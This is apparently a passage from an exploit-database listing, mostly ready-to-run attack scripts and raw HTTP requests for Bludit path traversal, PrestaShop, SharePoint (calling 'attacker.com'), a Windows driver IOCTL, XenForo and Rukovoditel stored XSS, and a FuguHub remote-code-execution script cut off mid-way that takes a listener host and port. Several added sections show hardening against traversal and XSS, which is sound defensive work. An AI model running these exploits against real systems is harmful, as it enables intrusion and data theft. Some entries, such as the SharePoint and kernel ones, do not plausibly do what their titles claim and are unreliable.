    args = parser.parse_args()
    print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)", "\nExploit Author: Antonio Cuomo (Arkantolo)\n")
    exploit(args)

def exploit(args):
    s2 = requests.Session()
    url = args.url.rstrip("/")

    # get csrf token
    r = s2.get(url + '/admin/')
    soup = BeautifulSoup(r.text, 'html.parser')
    formtoken = soup.find('input', {'name': 'tokenCSRF'})['value']

    # login
    body = {'tokenCSRF': formtoken, 'username': args.user, 'password': args.password}
    r = s2.post(url + '/admin/', data=body, allow_redirects=False)
    if (r.status_code == 301 and r.headers['location'].find('/admin/dashboard') != -1):
        print("[*] Login OK")
    else:
        print("[*] Login Failed")
        exit(1)

    # arbitrary download
    r = s2.get(url + '/plugin-backup-download?file=../../../../../../../../' + args.file)
    if (r.status_code == 200 and len(r.content) > 0):
        print("[*] File:")
        print(r.text)
    else:
        print("[*] Exploit Failed")
        exit(1)

if __name__ == '__main__':
    main()
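The download endpoint above takes the `file` value, prefixes the backup directory and serves whatever path results, so a name containing `../` walks out of that directory. As an added example (not Bludit's code and not the plugin's fix), the Python below shows the check such a handler needs: accept only a bare file name, resolve it under the backup directory, and refuse anything whose resolved parent is not that directory. `resolve_download`, `UnsafePath` and the temporary directory built in `demo()` are constructed for this example.

```python
"""Hardened file-name handling for a backup download endpoint (added example)."""
import os
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """Raised when a requested name would escape the backup directory."""


def resolve_download(backup_dir, requested):
    """Return the on-disk path for `requested`, or raise if it is not a file inside backup_dir."""
    base = Path(backup_dir).resolve()
    # Only a bare file name is acceptable: no directory separators, no
    # absolute path, no empty string. This rejects '../../../etc/passwd'
    # before any path arithmetic happens.
    if not requested or os.path.isabs(requested) or os.path.basename(requested) != requested:
        raise UnsafePath(requested)
    candidate = (base / requested).resolve()
    # resolve() follows symlinks and collapses '..', so a name such as '..'
    # or a symlink planted in the backup directory ends up outside base here.
    if candidate.parent != base:
        raise UnsafePath(requested)
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def demo():
    """Exercise the check against a throwaway backup directory (constructed input)."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "backup-2023-06-21.zip").write_bytes(b"PK")  # stand-in backup archive
        outcome = {}
        for requested in ("backup-2023-06-21.zip", "../../../../../../../../etc/passwd",
                          "/etc/passwd", "..", "sub/backup.zip", "", "missing.zip"):
            try:
                outcome[requested] = "served " + resolve_download(tmp, requested).name
            except UnsafePath:
                outcome[requested] = "rejected"
            except FileNotFoundError:
                outcome[requested] = "not found"
        return outcome


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name!r:45} -> {result}")
```

Two layers are deliberate: the bare-name test stops the obvious `../` strings cheaply, and the resolved-parent comparison catches what string checks miss (a lone `..`, or a symlink inside the backup directory that points elsewhere). Keeping the `FileNotFoundError` separate from `UnsafePath` lets the handler log traversal attempts differently from ordinary 404s.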
-
MCL-Net 4.3.5.8788 - Information Disclosure
# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure
# Date: 5/31/2023
# Exploit Author: Victor A. Morales, GM Sectec Inc.
# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php
# Version: 4.3.5.8788 (other versions may be affected)
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-34834

Description:
Directory browsing vulnerability in the MCL-Net version 4.3.5.8788 webserver running on default port 5080 allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.

Steps to reproduce:
1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory.
2. Browse to the "/file" directory and the database entry folders configured there.
3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.
-
Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288

#include <windows.h>
#include <wininet.h>   // InternetOpen / InternetConnect / HttpOpenRequest / InternetReadFile
#include <stdio.h>
#include <string.h>    // strlen

#pragma comment(lib, "wininet.lib")   // MSVC; with MinGW link with -lwininet instead

// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";

// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";

// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";

// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

// Defined after main(); declared here so main() can call it
BOOL InternetReadFileUrl(const char *url, HANDLE file);

int main()
{
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];

    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE) {
        printf("Error creating fake file: %d\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) {
        printf("Error writing fake file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE) {
        printf("Error creating vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file)) {
        printf("Error downloading vulnerable file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name)) {
        printf("Error deleting vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name)) {
        printf("Error replacing vulnerable file: %d\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL)) {
        printf("Error triggering vulnerability: %d\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");
    return 0;
}

// Fetch `url` over HTTP via WinINet; when `file` is not NULL the response body is written to it
BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];

    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL) {
        return FALSE;
    }

    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL) {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL) {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0)) {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) {
        if (file != NULL) {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}
-
Windows 11 22h2 - Kernel Privilege Elevation
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293

#include <windows.h>
#include <stdio.h>
#include <string.h>   // memset

// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";

// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";

// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003

// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

// Service Control Manager helpers, defined after main()
BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name);
BOOL UnloadDriver(LPCTSTR service_name);

int main()
{
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE];

    // Load the vulnerable driver
    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) {
        printf("Error loading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        printf("Error opening vulnerable driver device: %d\n", GetLastError());
        return 1;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) {
        printf("Error sending IOCTL: %d\n", GetLastError());
        return 1;
    }

    // Print the output buffer contents, bounded by bytes_returned (the driver does not NUL-terminate it)
    printf("Output buffer:\n%.*s\n", (int)bytes_returned, output_buffer);

    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver")) {
        printf("Error unloading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Close the vulnerable driver device
    CloseHandle(device);
    return 0;
}

// Register driver_name as a kernel service under service_name and start it
BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL) {
        return FALSE;
    }

    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER,
                            SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL) {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS) {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL) {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        } else {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Start the service
    if (!StartService(service, 0, NULL)) {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING) {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

// Stop and delete the kernel service registered by LoadDriver()
BOOL UnloadDriver(LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL) {
        return FALSE;
    }

    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL) {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE) {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Delete the service
    if (!DeleteService(service)) {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}
-
PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)
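The weakness class in the title is CWE-22: a download endpoint joins a caller-controlled name onto its download directory and serves whatever that resolves to. The script above only fetches one order PDF and does not show the containment check that is missing; the following is an added example, not the module's code or the advisory author's, that puts the naive join next to a hardened resolver and runs both over a constructed directory tree (a temp directory with a sample PDF, a secret outside the download directory, and an in-directory symlink pointing at that secret). The directory names mirror the dork path; the files and requests are constructed for the demonstration.

```python
import os
import tempfile


def naive_download_path(base_dir, requested):
    """The CWE-22 shape: concatenate the caller's value onto the download
    directory and serve whatever that resolves to. No containment check."""
    return os.path.join(base_dir, requested)


def safe_download_path(base_dir, requested):
    """Return the canonical path for `requested` only if it stays inside
    base_dir, otherwise None. Both sides go through realpath so '..'
    segments and symlinks are resolved before the comparison is made."""
    if not requested or "\x00" in requested:
        return None
    if os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:            # different drives on Windows
        inside = False
    return candidate if inside else None


def build_demo_tree():
    """Constructed layout: a download directory three levels below the shop
    root, one legitimate PDF, one secret outside the directory, and a
    symlink inside the directory that points at the secret."""
    root = tempfile.mkdtemp(prefix="winbiz_demo_")
    downloads = os.path.join(root, "modules", "winbizpayment", "downloads")
    os.makedirs(downloads)
    with open(os.path.join(downloads, "order_1234.pdf"), "wb") as f:
        f.write(b"%PDF-1.4\n% constructed sample order\n")
    with open(os.path.join(root, "config.php"), "w") as f:
        f.write("<?php // constructed secret: database credentials would live here\n")
    try:
        os.symlink(os.path.join(root, "config.php"),
                   os.path.join(downloads, "latest.pdf"))
    except OSError:
        pass  # symlink creation needs privileges on some Windows setups
    return root, downloads


# Constructed requests a client could send as the file name
REQUESTS = [
    "order_1234.pdf",           # legitimate
    "../../../config.php",      # classic traversal back to the shop root
    "latest.pdf",               # in-directory symlink that escapes
    "/etc/passwd",              # absolute path
    "order_1234.pdf\x00.txt",   # NUL truncation trick
]


def compare(downloads):
    """For each request: (does the naive join land on a readable file,
    does the hardened resolver accept the request)."""
    results = {}
    for req in REQUESTS:
        naive = naive_download_path(downloads, req)
        try:
            naive_readable = os.path.isfile(naive)
        except ValueError:          # embedded NUL on older Pythons
            naive_readable = False
        results[req] = (naive_readable, safe_download_path(downloads, req) is not None)
    return results


if __name__ == "__main__":
    _, downloads = build_demo_tree()
    for req, (naive_ok, safe_ok) in compare(downloads).items():
        print(f"{req!r:28} naive serves: {naive_ok!s:5}  hardened accepts: {safe_ok}")
```

The symlink case is why the check is done on realpath output rather than on a normalised string: `latest.pdf` contains no `..` and no slash, passes any pattern-based filter, and still resolves outside the directory. When the endpoint is keyed by an order ID rather than a file name, the stronger fix is to look the path up server-side from the ID and never accept a path from the client at all.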
-
Azure Apache Ambari 2302250400 - Spoofing
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage: Microsoft Apache Ambari Microsoft azure Hdinsights
# Tested on: Windows/Linux
# CVE : CVE-2023-23408

import requests

# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}


# Define a function to validate the headers
def validate_headers(headers):
    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
        return False
    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
        return False
    return True


# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
    if not validate_headers(headers):
        print("Invalid headers")
        return
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        print("Request successful")
    else:
        print("Request failed")


# Call the send_request function with the URL and headers
send_request(url, headers)
-
Xenforo Version 2.2.13 - Authenticated Stored XSS
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
-----------------------------------------------------------------------------

Requests

POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"

/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"

json
-----------------------------333176689514537912041638543422--

Response:

After the smilie category is created, the alert fires immediately: the title is stored unescaped and rendered on the admin smilies page.
-
Rukovoditel 3.4.1 - Multiple Stored XSS
Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs: Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task
4. open task
5. add comment as "<iframe src="https://14.rs"></iframe> "

POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=

===========================
###XSS-2###
===========================
1. go to admin account
2. go to configuration => application
3. Copyright Text set as "<img src=x onerror=alert(1)>"

POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"

ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"

Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"

ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"

ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"

<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"

english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"

America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"

10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"

m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"

m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"

2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"

0
-----------------------------12298384558648010343132232769--
-
Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Build the request parameters. requests URL-encodes parameter values itself,
# so the payload must not be pre-encoded with urllib.parse.quote(): doing so
# double-encodes it and the server receives the literal text "%3Cscript%3E..."
# instead of the tag.
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
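The script above prints the whole response and leaves the reader to eyeball it for the tag. Added here as an example (not the vendor's code and not part of the advisory) is the check a tester actually wants: a canary that carries a quote, a closing bracket, a tag and a unique token, and a classifier that tells a raw reflection (injectable) apart from an entity-encoded one (reflected but neutralised) and from no reflection at all. The two `print_page` functions are constructed stand-ins for `print.php`: one interpolates `nm_member` verbatim, the other applies `html.escape`, which is the fix. The same classifier applies to the stored cases on this page (the XenForo smilie-category title, the Rukovoditel comment and copyright text): there you run it over the page that later renders the stored value rather than over the response to the save request.

```python
import html
import secrets


def vulnerable_print_page(nm_member):
    """Constructed stand-in for a print.php that writes the parameter into the
    page verbatim, the pattern the advisory describes."""
    return (
        "<html><body>\n"
        f"<h2>Receipt for member: {nm_member}</h2>\n"
        "</body></html>"
    )


def fixed_print_page(nm_member):
    """Same page with output encoding. html.escape(quote=True) turns <, >, &,
    double and single quotes into entities, so the value can no longer leave
    the text node it was placed in."""
    return (
        "<html><body>\n"
        f"<h2>Receipt for member: {html.escape(nm_member, quote=True)}</h2>\n"
        "</body></html>"
    )


def make_canary(token=None):
    """Returns (token, canary). The canary is harmless on its own but contains
    every character an injection needs; the random token makes a match on the
    page unambiguous. `token` can be fixed for reproducible runs."""
    token = token or secrets.token_hex(4)
    return token, f'"><xss{token}>'


def classify_reflection(body, canary, token):
    """absent  : the token never appears, the parameter is not rendered here
       raw     : the canary came back byte-for-byte, markup intact -> injectable
       encoded : the token is there but at least one markup character was
                 altered (entity-encoded or stripped) -> reflected, not exploitable as-is"""
    if token not in body:
        return "absent"
    if canary in body:
        return "raw"
    return "encoded"


def probe_reflection(url, param, token=None):
    """Live variant: send the canary as `param` to `url` and classify the
    response body. Network access is assumed; `requests` is imported lazily so
    the offline functions above work without it."""
    import requests
    token, canary = make_canary(token)
    r = requests.get(url, params={param: canary}, timeout=10)
    return classify_reflection(r.text, canary, token)


if __name__ == "__main__":
    token, canary = make_canary()
    print("vulnerable page:", classify_reflection(vulnerable_print_page(canary), canary, token))
    print("fixed page:     ", classify_reflection(fixed_print_page(canary), canary, token))
    print("unrelated page: ", classify_reflection(vulnerable_print_page("bob"), canary, token))
```

A "raw" verdict is enough to report; a real browser-side proof (the `alert` in the advisory) only confirms what the classifier already established. An "encoded" verdict still deserves a look at which characters survived, since a context other than an HTML text node (an attribute value, a `<script>` block, a URL) needs a different encoding than `html.escape` provides.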
-
FuguHub 8.1 - Remote Code Execution
# Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359
# Vendor Homepage: https://fuguhub.com/
# Software Link: https://fuguhub.com/download.lsp
# Version: 8.1
# Tested on: Ubuntu 22.04.1
# CVE : CVE-2023-24078

import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Options for user registration, if no user has been created yet
username = 'admin'
password = 'password'
email = '[email protected]'

parser = argparse.ArgumentParser()
parser.add_argument("-r", "--rhost", help="Victims ip/url (omit the http://)", required=True)
parser.add_argument("-rp", "--rport", help="http port [Default 80]")
parser.add_argument("-l", "--lhost", help="Your IP", required=True)
parser.add_argument("-p", "--lport", help="Port you have your listener on", required=True)
args = parser.parse_args()

LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport is not None:
    port = args.rport
else:
    port = 80


def main():
    checkAccount()


def checkAccount():
    print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
    s = requests.Session()
    # Go to the set admin page... if page contains "User database already saved" then there are
    # already admin creds and we will try to login with the creds, otherwise we will manually
    # create an account
    r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp")
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('h1')
    if r.status_code == 404:
        print(Fore.RED + "[!]" + Fore.WHITE + " Page not found! Check the following: \n\tTaget IP\n\tTarget Port")
        exit(0)
    userExists = False
    userText = 'User database already saved'
    for i in (search or []):          # find() returns None when there is no <h1>
        if i.string == userText:
            userExists = True
    if userExists:
        print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
